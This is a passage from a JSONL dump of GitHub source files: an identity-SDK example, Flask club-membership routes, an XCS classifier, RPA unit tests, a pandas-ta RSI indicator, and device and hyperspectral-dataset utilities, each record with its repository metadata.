)","repo_name":"tsukasa2/AtCoder","sub_path":"contest/ARC/ARC121/arc121-b.py","file_name":"arc121-b.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3896390267","text":"\"\"\"\nThis file contains examples of Identify API usage.\n\"\"\"\n\nfrom indykite_sdk.identity import IdentityClient\n\n\ndef introspect_token_example():\n token = \"JWT TOKEN\"\n client = IdentityClient()\n token_info = client.introspect_token(token)\n if token_info is not None:\n print(\"Token info\")\n print(\"Tenant: \" + token_info.subject.tenantId)\n print(\"Customer: \" + token_info.customerId)\n print(\"App space: \" + token_info.appSpaceId)\n print(\"Application: \" + token_info.applicationId)\n print(\"Subject: \" + token_info.subject.id)\n print(\"Expire time: \" + str(token_info.expireTime))\n\n\ndef verify_digital_twin_email_example():\n token = \"VERIFICATION TOKEN FROM TEMPORAL\"\n client = IdentityClient()\n digital_twin_info = client.verify_digital_twin_email(token)\n if digital_twin_info is not None:\n print(\"Digital twin info\")\n print(\"Tenant: \" + digital_twin_info.tenantId)\n print(\"Digital twin: \" + digital_twin_info.id)\n\n\ndef digital_twin_by_token():\n token = \"JWT TOKEN\"\n client = IdentityClient()\n digital_twin = client.get_digital_twin_by_token(token, [\"email\"])\n if digital_twin is not None:\n if \"digitalTwin\" in digital_twin:\n print(digital_twin[\"digitalTwin\"])\n if \"tokenInfo\" in digital_twin:\n print(\"\\nToken info:\")\n print(digital_twin[\"tokenInfo\"])\n\n\ndef digital_twin():\n dt_id = \"DIGITAL TWIN ID\"\n tenant_id = \"TENANT ID\"\n client = IdentityClient()\n digital_twin = client.get_digital_twin(dt_id, tenant_id, [\"email\", \"address\"])\n print(\"Digital Twin info\")\n if digital_twin is not None:\n if \"digitalTwin\" in digital_twin:\n print(digital_twin[\"digitalTwin\"])\n if \"tokenInfo\" in digital_twin:\n print(\"\\nToken info:\")\n print(digital_twin[\"tokenInfo\"])\n\n\ndef enrich_token():\n token = \"JWT TOKEN\"\n claims = {\n \"string_claim\": \"string_value\",\n \"number_claim\": 42,\n \"bool_claim\": True,\n \"null_claim\": None,\n \"map_claim\": {\n \"key\": \"value\",\n },\n \"array_claim\": [\n \"string_value\",\n ]\n }\n client = IdentityClient()\n response = client.enrich_token(token, claims, claims)\n if response is not None:\n print(\"Successfully enriched token\")\n else:\n print(\"Invalid token\")\n","repo_name":"indykite/indykite-sdk-python","sub_path":"indykite_sdk/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37252110591","text":"from flask import (render_template, url_for, flash,\n redirect, request, abort, Blueprint)\nfrom flask_login import current_user, login_required\nfrom clubmanager import db\nfrom clubmanager.models import Club, User, Membership\nfrom clubmanager.clubs.forms import ClubForm\n\n\nclubs = Blueprint('clubs', __name__)\n\ndef user_is_member(club_id, players):\n active_status = False\n for p in players:\n if p.member == current_user:\n if p.is_member == True:\n active_status = True\n return active_status\n\ndef user_is_admin(club_id, players):\n admin_status = False\n for p in players:\n if p.member == current_user:\n if p.is_admin == True:\n admin_status = True\n return admin_status\n\ndef user_is_pending(club_id, club):\n player_list = []\n pending_status = False\n for m in club.members:\n p = User(id=m.user_id)\n player_list.append(p)\n if current_user in player_list:\n pending_status = True\n else:\n pending_status = False\n return pending_status\n\n\n@clubs.route(\"/\")\n@login_required\ndef home():\n page = request.args.get('page',1, type=int)\n clubs = Club.query.all()\n return render_template('home.html', clubs=clubs)\n\n@clubs.route(\"/club/new\", methods=['GET', 'POST'])\n@login_required\ndef new_club():\n form = ClubForm()\n if form.validate_on_submit():\n club = Club(name=form.name.data)\n db.session.add(club)\n db.session.commit()\n flash('Your club has been created!', 'success')\n return redirect(url_for('clubs.home'))\n return render_template('create_club.html', title='New Club',\n form=form, legend='New Club')\n\n@clubs.route(\"/club/\")\n@login_required\ndef club(club_id):\n club = Club.query.get_or_404(club_id)\n players = club.members\n teams = club.teams\n '''I want to see if the user is an admin'''\n admin_status = user_is_admin(club_id, players)\n '''I want to see if the user is in the list of members'''\n pending_status = user_is_pending(club_id, club)\n '''I want to see if the user has an approved membership'''\n active_status = user_is_member(club_id, players)\n return render_template('club.html', club=club, players=players, teams=teams, active_status=active_status,\n pending_status=pending_status, admin_status=admin_status)\n\n@clubs.route(\"/club//join\", methods=['GET', 'POST'])\n@login_required\ndef join_club(club_id):\n club = Club.query.get_or_404(club_id)\n user = current_user\n membership = Membership(user_id=user.id, club_id=club.id)\n db.session.add(membership)\n db.session.commit()\n return redirect(url_for('clubs.club', club_id=club.id))\n\n@clubs.route(\"/club//leave\", methods=['GET', 'POST'])\n@login_required\ndef leave_club(club_id):\n club = Club.query.get_or_404(club_id)\n user = User.query.get(current_user.id)\n membership = Membership.query.filter_by(user_id=user.id).filter_by(club_id=club.id)\n final = membership[0]\n db.session.delete(final)\n db.session.commit()\n return redirect(url_for('clubs.club', club_id=club.id))\n\n@clubs.route(\"/club//user//approve_member\", methods=['GET', 'POST'])\n@login_required\ndef approve_member(club_id, user_id):\n '''Load the club, user and corresponding membership object'''\n club = Club.query.get_or_404(club_id)\n players = club.members\n user = User.query.get(user_id)\n membership = Membership.query.filter_by(user_id=user.id).filter_by(club_id=club.id)\n final = membership[0]\n '''I need to do a check to make sure the current user is an admin of the club'''\n admin_status = False\n for p in players:\n if p.member == current_user:\n if p.is_admin == True:\n admin_status = True\n if admin_status == True:\n final.is_member = True\n db.session.add(final)\n db.session.commit()\n return redirect(url_for('clubs.club', club_id=club.id))\n\n@clubs.route(\"/club//user//make_admin\", methods=['GET', 'POST'])\n@login_required\ndef make_admin(club_id, user_id):\n '''Load the club, user and corresponding membership object'''\n club = Club.query.get_or_404(club_id)\n players = club.members\n user = User.query.get(user_id)\n membership = Membership.query.filter_by(user_id=user.id).filter_by(club_id=club.id)\n final = membership[0]\n '''I need to do a check to make sure the current user is an admin of the club'''\n admin_status = False\n for p in players:\n if p.member == current_user:\n if p.is_admin == True:\n admin_status = True\n if admin_status == True:\n final.is_admin = True\n db.session.add(final)\n db.session.commit()\n return redirect(url_for('clubs.club', club_id=club.id))\n\n@clubs.route(\"/club//user//remove_member\", methods=['GET', 'POST'])\n@login_required\ndef remove_member(club_id, user_id):\n '''Load the club, user and corresponding membership object'''\n club = Club.query.get_or_404(club_id)\n players = club.members\n user = User.query.get(user_id)\n membership = Membership.query.filter_by(user_id=user.id).filter_by(club_id=club.id)\n final = membership[0]\n '''I need to do a check to make sure the current user is an admin of the club'''\n admin_status = False\n for p in players:\n if p.member == current_user:\n if p.is_admin == True:\n admin_status = True\n if admin_status == True:\n db.session.delete(final)\n db.session.commit()\n return redirect(url_for('clubs.club', club_id=club.id))\n\n\n@clubs.route(\"/club//user/\")\n@login_required\ndef member_profile(club_id, user_id):\n '''Load the club, user and corresponding membership object'''\n club = Club.query.get_or_404(club_id)\n user = User.query.get_or_404(user_id)\n club_teams = club.teams\n club_list = []\n for c in user.clubs:\n i = Club(id=c.club_id)\n club_list.append(i)\n return render_template('member_profile.html', club=club, user=user,\n club_list=club_list, club_teams=club_teams)\n","repo_name":"egibney/club-manager","sub_path":"clubmanager/clubs/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":6182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3088247104","text":"#!/usr/local/bin python\n# -*- coding:utf-8 -*-\n\nimport math\nfrom XCSConfig import *\n\nclass XCSClassifier:\n def __init__(self,condition,actual_time):\n self.condition = condition[:]\n self.time_stamp = actual_time\n self.numerosity = 1\n self.action_set_size = 1\n self.action = 1\n \"\"\"initialization parameters{p,e,f}\n should be taken very small\"\"\"\n self.prediction = 0.01\n self.error = 0.01\n self.fitness = 0.01\n def deep_copy(self,actual_time):\n cl = XCSClassifier(self.condition,actual_time)\n cl.action = self.action\n cl.prediction = self.prediction\n cl.error = self.error\n cl.fitness = self.fitness/self.numerosity\n cl.numerosity = self.numerosity\n cl.experience = self.experience\n cl.time_stamp = actual_time\n cl.action_set_size = self.action_set_size\n return cl\n def update_fitness(self,acc_sum):\n self.fitness += conf.beta*(self.get_kappa()*self.numerosity/acc_sum-self.fitness)\n def update_parameters(self,reward,num_sum):\n self.experience += 1\n if self.experience < (1/conf.beta):\n self.prediction += (reward-self.prediction)/self.experience\n else:\n self.prediction += conf.beta*(reward-self.prediction)\n if self.experience < (1/conf.beta):\n self.error += (math.fabs(reward-self.prediction)-self.error)/self.experience\n else:\n self.error += conf.beta*(math.fabs(reward-self.prediction)-self.error)\n if self.experience < (1/conf.beta):\n self.action_set_size += (num_sum-self.action_set_size)/self.experience\n else:\n self.action_set_size += conf.beta*(num_sum-self.action_set_size)\n def deletion_vote(self,ave_fitness):\n vote = self.action_set_size*self.numerosity\n if self.experience > conf.theta_del:\n if self.fitness/self.numerosity < conf.delta*ave_fitness:\n vote *= ave_fitness/(self.fitness/self.numerosity)\n return vote\n def equals(self,cl):\n if self.condition == cl.condition:\n if self.action == cl.action:\n return True\n return False\n def does_subsume(self,cl_tos):\n if self.action == cl_tos.action:\n if self.could_subsume() and self.is_more_general(cl_tos):\n return True\n return False\n def could_subsume(self):\n if self.experience > conf.theta_sub and self.error < conf.epsilon_0:\n return True\n return False\n def is_more_general(self,cl_spec):\n ret = False\n for i in range(len(self.condition)):\n if self.condition[i] != '#' and self.condition[i] != cl_spec.condition[i]:\n return False\n elif self.condition[i] != cl_spec.condition[i]:\n ret = True\n return ret\n def get_kappa(self):\n kappa = 0.0\n if self.error < conf.epsilon_0:\n kappa = 1.0\n else:\n kappa = conf.alpha*math.pow(self.error/conf.epsilon_0,-conf.nyu)\n return kappa\n\n# for debug\n# if __name__ == '__main__':\n# a = [XCSClassifier([0,0,1],0),XCSClassifier([0,1,0],1)]\n# for cl in a:\n# cl.action += 1\n# print cl.action\n","repo_name":"minatosato/XCS","sub_path":"XCSClassifier.py","file_name":"XCSClassifier.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37277829686","text":"import pytest\n\nfrom vayesta import rpa\nfrom vayesta.tests.common import TestCase\nfrom vayesta.tests import testsystems\n\n\nclass DiamondRIRPATest(TestCase):\n PLACES = 8\n\n @classmethod\n def setUpClass(cls):\n cls.sys = testsystems.diamond_sto3g_s211\n cls.known_results = dict(e_tot=-149.51936410641733, e_corr=-0.19193623440986585)\n\n def _test_energy(self, myrpa):\n \"\"\"Test the RPA energy.\"\"\"\n self.assertAlmostEqual(myrpa.e_corr, self.known_results[\"e_corr\"], self.PLACES)\n self.assertAlmostEqual(myrpa.e_tot, self.known_results[\"e_tot\"], self.PLACES)\n\n @pytest.mark.slow\n def test_energy_rhf_opt(self):\n \"\"\"Tests for diamond with optimised RHF dRPA code.\"\"\"\n\n rirpa = rpa.rirpa.ssRIdRRPA(self.sys.rhf())\n rirpa.kernel_energy()\n self._test_energy(rirpa)\n\n @pytest.mark.fast\n def test_energy_rhf_generic(self):\n \"\"\"Tests for diamond with generic RHF RIRPA code.\"\"\"\n\n rirpa = rpa.rirpa.ssRIRRPA(self.sys.rhf())\n rirpa.kernel_energy()\n self._test_energy(rirpa)\n\n @pytest.mark.slow\n def test_energy_uhf(self):\n \"\"\"Tests for diamond with generic UHF RIRPA code.\"\"\"\n\n rirpa = rpa.rirpa.ssRIURPA(self.sys.uhf())\n rirpa.kernel_energy()\n self._test_energy(rirpa)\n\n @pytest.mark.fast\n def test_rhf_moments(self):\n gen_rirpa = rpa.rirpa.ssRIRRPA(self.sys.rhf())\n opt_rirpa = rpa.rirpa.ssRIdRRPA(self.sys.rhf())\n mom0_gen = gen_rirpa.kernel_moms(0)[0]\n mom0_opt = opt_rirpa.kernel_moms(0)[0]\n self.assertAllclose(mom0_gen, mom0_opt, self.PLACES)\n\n\n@pytest.mark.slow\nclass GrapheneRIRPATest(DiamondRIRPATest):\n @classmethod\n def setUpClass(cls):\n cls.sys = testsystems.graphene_sto3g_s211\n cls.known_results = dict(e_tot=-150.15057360171875, e_corr=-0.17724246753903117)\n","repo_name":"BoothGroup/Vayesta","sub_path":"vayesta/tests/rpa/test_rirpa_solids.py","file_name":"test_rirpa_solids.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"31"} +{"seq_id":"4362618383","text":"# -*- coding: utf-8 -*-\nfrom pandas import DataFrame, concat\nfrom pandas_ta import Imports\nfrom pandas_ta.overlap import rma\nfrom pandas_ta.utils import get_drift, get_offset, verify_series, signals\n\n\ndef rsi(close, length=None, scalar=None, talib=None, drift=None, offset=None, **kwargs):\n \"\"\"Indicator: Relative Strength Index (RSI)\"\"\"\n # Validate arguments\n length = int(length) if length and length > 0 else 14\n scalar = float(scalar) if scalar else 100\n close = verify_series(close, length)\n drift = get_drift(drift)\n offset = get_offset(offset)\n mode_tal = bool(talib) if isinstance(talib, bool) else True\n\n if close is None: return\n\n # Calculate Result\n if Imports[\"talib\"] and mode_tal:\n from talib import RSI\n rsi = RSI(close, length)\n else:\n negative = close.diff(drift)\n positive = negative.copy()\n\n positive[positive < 0] = 0 # Make negatives 0 for the postive series\n negative[negative > 0] = 0 # Make postives 0 for the negative series\n\n positive_avg = rma(positive, length=length)\n negative_avg = rma(negative, length=length)\n\n rsi = scalar * positive_avg / (positive_avg + negative_avg.abs())\n\n # Offset\n if offset != 0:\n rsi = rsi.shift(offset)\n\n # Handle fills\n if \"fillna\" in kwargs:\n rsi.fillna(kwargs[\"fillna\"], inplace=True)\n if \"fill_method\" in kwargs:\n rsi.fillna(method=kwargs[\"fill_method\"], inplace=True)\n\n # Name and Categorize it\n rsi.name = f\"RSI_{length}\"\n rsi.category = \"momentum\"\n\n signal_indicators = kwargs.pop(\"signal_indicators\", False)\n if signal_indicators:\n signalsdf = concat(\n [\n DataFrame({rsi.name: rsi}),\n signals(\n indicator=rsi,\n xa=kwargs.pop(\"xa\", 80),\n xb=kwargs.pop(\"xb\", 20),\n xserie=kwargs.pop(\"xserie\", None),\n xserie_a=kwargs.pop(\"xserie_a\", None),\n xserie_b=kwargs.pop(\"xserie_b\", None),\n cross_values=kwargs.pop(\"cross_values\", False),\n cross_series=kwargs.pop(\"cross_series\", True),\n offset=offset,\n ),\n ],\n axis=1,\n )\n\n return signalsdf\n else:\n return rsi\n\n\nrsi.__doc__ = \\\n\"\"\"Relative Strength Index (RSI)\n\nThe Relative Strength Index is popular momentum oscillator used to measure the\nvelocity as well as the magnitude of directional price movements.\n\nSources:\n https://www.tradingview.com/wiki/Relative_Strength_Index_(RSI)\n\nCalculation:\n Default Inputs:\n length=14, scalar=100, drift=1\n ABS = Absolute Value\n RMA = Rolling Moving Average\n\n diff = close.diff(drift)\n positive = diff if diff > 0 else 0\n negative = diff if diff < 0 else 0\n\n pos_avg = RMA(positive, length)\n neg_avg = ABS(RMA(negative, length))\n\n RSI = scalar * pos_avg / (pos_avg + neg_avg)\n\nArgs:\n close (pd.Series): Series of 'close's\n length (int): It's period. Default: 14\n scalar (float): How much to magnify. Default: 100\n talib (bool): If TA Lib is installed and talib is True, Returns the TA Lib\n version. Default: True\n drift (int): The difference period. Default: 1\n offset (int): How many periods to offset the result. Default: 0\n\nKwargs:\n fillna (value, optional): pd.DataFrame.fillna(value)\n fill_method (value, optional): Type of fill method\n\nReturns:\n pd.Series: New feature generated.\n\"\"\"\n","repo_name":"twopirllc/pandas-ta","sub_path":"pandas_ta/momentum/rsi.py","file_name":"rsi.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":4180,"dataset":"github-code","pt":"31"} +{"seq_id":"35741514108","text":"import pygame\nfrom Parts import Game\nfrom Parts import Paddle\nfrom Parts import Ball\n\n\npygame.init()\npygame.font.init()\n\nWIDTH, HEIGHT = 1000, 700\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\n\nSQ_SIZE = 10\nboard_shape = [int(WIDTH/SQ_SIZE), int((HEIGHT-200)/SQ_SIZE)]\n\nball_w = 8\nball_h = 8\nball_speed = -9\nball = Ball(WIN, round(WIDTH/2 - ball_w/2), 650, ball_w, ball_h, ball_speed)\n\npaddle_w = 100\npaddle_h = 20\npaddle_speed = 15\npaddle = Paddle(WIN, WIDTH/2 - paddle_w/2, HEIGHT - paddle_h - 10, paddle_w, paddle_h, paddle_speed)\nFPS = 30\n\n\ngame = Game(WIN, FPS, board_shape, SQ_SIZE, ball, paddle)\ngame.run()\n","repo_name":"Emc2356/ball-with-cubes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13161734892","text":"import os\nimport math\nfrom ctypes import *\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nimport libtiepie\n\nPRODUCT_IDS = {\n \"Combi\": libtiepie.PID_COMBI,\n \"HP3\": libtiepie.PID_HP3,\n \"HS4\": libtiepie.PID_HS4,\n \"HS4D\": libtiepie.PID_HS4D,\n \"HS5\": libtiepie.PID_HS5,\n}\n\nlibc = cdll.LoadLibrary(\"libc.so.6\")\n\n\ndef eventfd(init_val=0, flags=0):\n return libc.eventfd(init_val, flags)\n\n\ndef eventfd_clear(fd):\n os.read(fd, 8)\n\n\ndef try_open_device(argv, device_type):\n dev = None\n\n if len(argv) > 1:\n serial = 0\n try:\n serial = int(argv[1])\n except:\n pid = str_to_pid(argv[1])\n\n if serial > 0:\n dev = libtiepie.device_list.get_item_by_serial_number(serial).open_device(device_type)\n else:\n dev = libtiepie.device_list.get_item_by_product_id(pid).open_device(device_type)\n else:\n for item in libtiepie.device_list:\n try:\n dev = item.open_device(device_type)\n break\n except:\n pass\n\n if dev:\n return dev\n else:\n raise Exception(\"No devices found\")\n\n\ndef create_ui(item, parent=None):\n\n scp = item.open_oscilloscope() if (item.types & libtiepie.DEVICETYPE_OSCILLOSCOPE) != 0 else None\n if scp:\n from oscilloscopeui import OscilloscopeUI\n scpui = OscilloscopeUI(scp, parent)\n scpui.show()\n\n gen = item.open_generator() if (item.types & libtiepie.DEVICETYPE_GENERATOR) != 0 else None\n if gen:\n from generatorui import GeneratorUI\n genui = GeneratorUI(gen, parent)\n genui.show()\n\n\ndef val_to_str(value, digits=6, decimals=3):\n value_abs = float(abs(value))\n prefix = ''\n\n if value_abs >= 1e9:\n value /= 1e9\n prefix = 'G'\n elif value_abs >= 1e6:\n value /= 1e6\n prefix = 'M'\n elif value_abs >= 1e3:\n value /= 1e3\n prefix = 'k'\n elif value_abs < 1e-9:\n pass # almost zero, no prefix\n elif value_abs < 1e-6:\n value *= 1e9\n prefix = 'n'\n elif value_abs < 1e-3:\n value *= 1e6\n prefix = 'u'\n elif value_abs < 1e0:\n value *= 1e3\n prefix = 'm'\n\n s = \"{:\" + str(digits - decimals) + \".\" + str(decimals) + \"f} {:s}\"\n return s.format(value, prefix)\n\n\ndef ceil_125(value):\n factor = 10 ** math.floor(math.log10(value))\n value /= factor\n\n if value <= 1:\n value = 1\n elif value <= 2:\n value = 2\n elif value <= 5:\n value = 5\n else:\n value = 10\n\n return value * factor\n\n\ndef sequence_125(min, max):\n values = []\n value = ceil_125(min)\n\n while value <= max:\n values.append(value)\n value = ceil_125(value * 2)\n\n return values\n\n\ndef str_to_pid(value):\n if value in PRODUCT_IDS:\n return PRODUCT_IDS[value]\n else:\n raise Exception(\"Invalid product ID: \" + value)\n\n\ndef unwrap_QVariant(value):\n if(value.type() == QMetaType.Int):\n return value.toInt()[0]\n elif(value.type() == QMetaType.Double):\n return value.toDouble()[0]\n elif(value.type() == QMetaType.QVariantMap):\n return dict((str(k), v) for k, v in value.toPyObject().iteritems())\n elif(value.typeName() == \"PyQt_PyObject\"):\n return value.toPyObject()\n elif(value.isNull()):\n return None\n else:\n raise Exception(\"Can't unwrap QVariant: \" + value.typeName())\n","repo_name":"reinder/libtiepie-ui","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12016698645","text":"import os\nimport urllib.parse as up\n\nfrom werkzeug.middleware.proxy_fix import ProxyFix\nfrom flask import url_for, make_response, jsonify\nfrom flask_migrate import Migrate, MigrateCommand\nfrom flask_script import Manager\n\nfrom src import api, db, ma, create_app, configs, bp, security, admin, celery, serializer_helper, sentry,\\\n redis_store, sms, url_shortener, limiter, jwt, razor\n\n\nconfig = os.environ.get('PYTH_SRVR', 'default')\n\nconfig = configs.get(config)\n\nextensions = [api, db, ma, security, admin, celery, serializer_helper, sentry, redis_store,\n sms, url_shortener, limiter, jwt, razor]\nbps = [bp]\n\napp = create_app(__name__, config, extensions=extensions, blueprints=bps)\napp.wsgi_app = ProxyFix(app.wsgi_app, num_proxies=2)\nmanager = Manager(app)\nmigrate = Migrate(app, db)\nmanager.add_command('db', MigrateCommand)\n\n\n@manager.shell\ndef _shell_context():\n return dict(\n app=app,\n db=db,\n ma=ma,\n config=config\n )\n\n\n@manager.command\ndef list_routes():\n output = []\n for rule in app.url_map.iter_rules():\n options = {}\n for arg in rule.arguments:\n options[arg] = \"[{0}]\".format(arg)\n methods = ','.join(rule.methods)\n url = url_for(rule.endpoint, **options)\n line = up.unquote(\"{:50s} {:20s} {}\".format(rule.endpoint, methods, url))\n output.append(line)\n\n for line in sorted(output):\n print(line)\n\n\n@manager.option('-A', '--application', dest='application', default='', required=True)\n@manager.option('-n', '--name', dest='name')\n@manager.option('-l', '--debug', dest='debug')\n@manager.option('-f', '--logfile', dest='logfile')\n@manager.option('-P', '--pool', dest='pool')\n@manager.option('-Q', '--queue', dest='queue')\n@manager.option('-c', '--concurrency', dest='concurrency', default=2)\ndef worker(application, concurrency, pool, debug, logfile, name, queue):\n celery.start()\n\n\n@app.route('/api/v1/health', methods=['GET'])\ndef status():\n return make_response(jsonify({'success': True, \"message\": 'Success', 'count': 0}), 200)\n\n\n@limiter.exempt\n@app.route('/api/v1/ping', methods=['GET'])\ndef ping():\n # from time import sleep\n # import random\n # sleep(random.randint(2, 4))\n return make_response(jsonify({'success': True, \"message\": 'Success'}), 200)\n\n\nif __name__ == \"__main__\":\n manager.run()\n","repo_name":"saurabh1e/boiler-plate","sub_path":"API/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"72584909209","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis file contains the PyTorch dataset for hyperspectral images and\r\nrelated helpers.\r\n\"\"\"\r\nimport spectral\r\nimport numpy as np\r\nimport torch\r\nimport torch.utils\r\nimport torch.utils.data\r\nimport os\r\nimport cv2\r\nfrom tqdm import tqdm\r\nimport h5py\r\n\r\ntry:\r\n # Python 3\r\n from urllib.request import urlretrieve\r\nexcept ImportError:\r\n # Python 2\r\n from urllib import urlretrieve\r\n\r\nfrom utils import open_file\r\n\r\nDATASETS_CONFIG = {\r\n 'PaviaC': {\r\n 'urls': ['http://www.ehu.eus/ccwintco/uploads/e/e3/Pavia.mat',\r\n 'http://www.ehu.eus/ccwintco/uploads/5/53/Pavia_gt.mat'],\r\n 'img': 'Pavia.mat',\r\n 'gt': 'Pavia_gt.mat'\r\n },\r\n 'PaviaU': {\r\n 'urls': ['http://www.ehu.eus/ccwintco/uploads/e/ee/PaviaU.mat',\r\n 'http://www.ehu.eus/ccwintco/uploads/5/50/PaviaU_gt.mat'],\r\n 'img': 'PaviaU.mat',\r\n 'gt': 'PaviaU_gt.mat'\r\n },\r\n 'KSC': {\r\n 'urls': ['http://www.ehu.es/ccwintco/uploads/2/26/KSC.mat',\r\n 'http://www.ehu.es/ccwintco/uploads/a/a6/KSC_gt.mat'],\r\n 'img': 'KSC.mat',\r\n 'gt': 'KSC_gt.mat'\r\n },\r\n 'IndianPines': {\r\n 'urls': ['http://www.ehu.eus/ccwintco/uploads/6/67/Indian_pines_corrected.mat',\r\n 'http://www.ehu.eus/ccwintco/uploads/c/c4/Indian_pines_gt.mat'],\r\n 'img': 'Indian_pines_corrected.mat',\r\n 'gt': 'Indian_pines_gt.mat'\r\n },\r\n 'Botswana': {\r\n 'urls': ['http://www.ehu.es/ccwintco/uploads/7/72/Botswana.mat',\r\n 'http://www.ehu.es/ccwintco/uploads/5/58/Botswana_gt.mat'],\r\n 'img': 'Botswana.mat',\r\n 'gt': 'Botswana_gt.mat',\r\n },\r\n 'Salinas':{\r\n 'img': 'Salinas.mat',\r\n 'gt': 'Salinas_gt.mat',\r\n }\r\n}\r\n\r\ntry:\r\n from custom_datasets import CUSTOM_DATASETS_CONFIG\r\n\r\n DATASETS_CONFIG.update(CUSTOM_DATASETS_CONFIG)\r\nexcept ImportError:\r\n pass\r\n\r\n\r\nclass TqdmUpTo(tqdm):\r\n \"\"\"Provides `update_to(n)` which uses `tqdm.update(delta_n)`.\"\"\"\r\n\r\n def update_to(self, b=1, bsize=1, tsize=None):\r\n \"\"\"\r\n b : int, optional\r\n Number of blocks transferred so far [default: 1].\r\n bsize : int, optional\r\n Size of each block (in tqdm units) [default: 1].\r\n tsize : int, optional\r\n Total size (in tqdm units). If [default: None] remains unchanged.\r\n \"\"\"\r\n if tsize is not None:\r\n self.total = tsize\r\n self.update(b * bsize - self.n) # will also set self.n = b * bsize\r\n\r\n\r\ndef get_dataset(dataset_name, target_folder=\"./\", datasets=DATASETS_CONFIG, patch_size=5):\r\n \"\"\" Gets the dataset specified by name and return the related components.\r\n Args:\r\n dataset_name: string with the name of the dataset\r\n target_folder (optional): folder to store the datasets, defaults to ./\r\n datasets (optional): dataset configuration dictionary, defaults to prebuilt one\r\n Returns:\r\n img: 3D hyperspectral image (WxHxB)\r\n gt: 2D int array of labels\r\n label_values: list of class names\r\n ignored_labels: list of int classes to ignore\r\n rgb_bands: int tuple that correspond to red, green and blue bands\r\n \"\"\"\r\n palette = None\r\n\r\n if dataset_name not in datasets.keys():\r\n raise ValueError(\"{} dataset is unknown.\".format(dataset_name))\r\n\r\n dataset = datasets[dataset_name]\r\n\r\n folder = target_folder + datasets[dataset_name].get('folder', dataset_name + '/') # get()函数返回指定键的值,如果指定键的值不存在时,返回该默认值值。\r\n if dataset.get('download', False): # 我将True改成了False ,默认不下载\r\n # Download the dataset if is not present\r\n if not os.path.isdir(folder): # 用于判断对象是否为一个目录\r\n os.mkdir(folder)\r\n for url in datasets[dataset_name]['urls']:\r\n # download the files\r\n filename = url.split('/')[-1]\r\n if not os.path.exists(folder + filename):\r\n with TqdmUpTo(unit='B', unit_scale=True, miniters=1,\r\n desc=\"Downloading {}\".format(filename)) as t:\r\n urlretrieve(url, filename=folder + filename, # 利用urlretrieve()将数据下载到本地。\r\n reporthook=t.update_to)\r\n elif not os.path.isdir(folder):\r\n print(\"WARNING: {} is not downloadable.\".format(dataset_name))\r\n\r\n if dataset_name == 'PaviaC':\r\n # Load the image\r\n img = open_file(folder + 'Pavia.mat')['pavia']\r\n\r\n rgb_bands = (55, 41, 12)\r\n\r\n gt = open_file(folder + 'Pavia_gt.mat')['pavia_gt']\r\n\r\n label_values = [\"Undefined\", \"Water\", \"Trees\", \"Asphalt\",\r\n \"Self-Blocking Bricks\", \"Bitumen\", \"Tiles\", \"Shadows\",\r\n \"Meadows\", \"Bare Soil\"]\r\n\r\n ignored_labels = [0]\r\n\r\n elif dataset_name == 'PaviaU':\r\n # Load the image\r\n img = open_file(folder + 'PaviaU.mat')['paviaU']\r\n # img = open_file(folder + 'paviaU_PCA_30.mat')['q'] # PCA\r\n # feature = h5py.File(folder + 'paviaU_PCA_30.mat')\r\n # img = feature['q']\r\n\r\n rgb_bands = (55, 41, 12)\r\n\r\n gt = open_file(folder + 'PaviaU_gt.mat')['paviaU_gt']\r\n\r\n label_values = [\"Undefined\", 'Asphalt', 'Meadows', 'Gravel', 'Trees',\r\n 'Painted metal sheets', 'Bare Soil', 'Bitumen',\r\n 'Self-Blocking Bricks', 'Shadows']\r\n\r\n ignored_labels = [0]\r\n\r\n elif dataset_name == 'IndianPines':\r\n # Load the image\r\n img = open_file(folder + 'Indian_pines_corrected.mat')\r\n img = img['indian_pines_corrected']\r\n\r\n # img = open_file(folder + 'indian_pines_80.mat') # 80层引导滤波\r\n # img = img['q']\r\n\r\n # img = open_file(folder + 'indian_pines_PCA_30.mat') # PCA\r\n # img = img['q'] # PCA\r\n\r\n rgb_bands = (43, 21, 11) # AVIRIS sensor\r\n\r\n gt = open_file(folder + 'Indian_pines_gt.mat')['indian_pines_gt']\r\n label_values = [\"Undefined\", \"Alfalfa\", \"Corn-notill\", \"Corn-mintill\",\r\n \"Corn\", \"Grass-pasture\", \"Grass-trees\",\r\n \"Grass-pasture-mowed\", \"Hay-windrowed\", \"Oats\",\r\n \"Soybean-notill\", \"Soybean-mintill\", \"Soybean-clean\",\r\n \"Wheat\", \"Woods\", \"Buildings-Grass-Trees-Drives\",\r\n \"Stone-Steel-Towers\"]\r\n\r\n ignored_labels = [0]\r\n\r\n elif dataset_name == 'Botswana':\r\n # Load the image\r\n img = open_file(folder + 'Botswana.mat')['Botswana']\r\n\r\n rgb_bands = (75, 33, 15)\r\n\r\n gt = open_file(folder + 'Botswana_gt.mat')['Botswana_gt']\r\n label_values = [\"Undefined\", \"Water\", \"Hippo grass\",\r\n \"Floodplain grasses 1\", \"Floodplain grasses 2\",\r\n \"Reeds\", \"Riparian\", \"Firescar\", \"Island interior\",\r\n \"Acacia woodlands\", \"Acacia 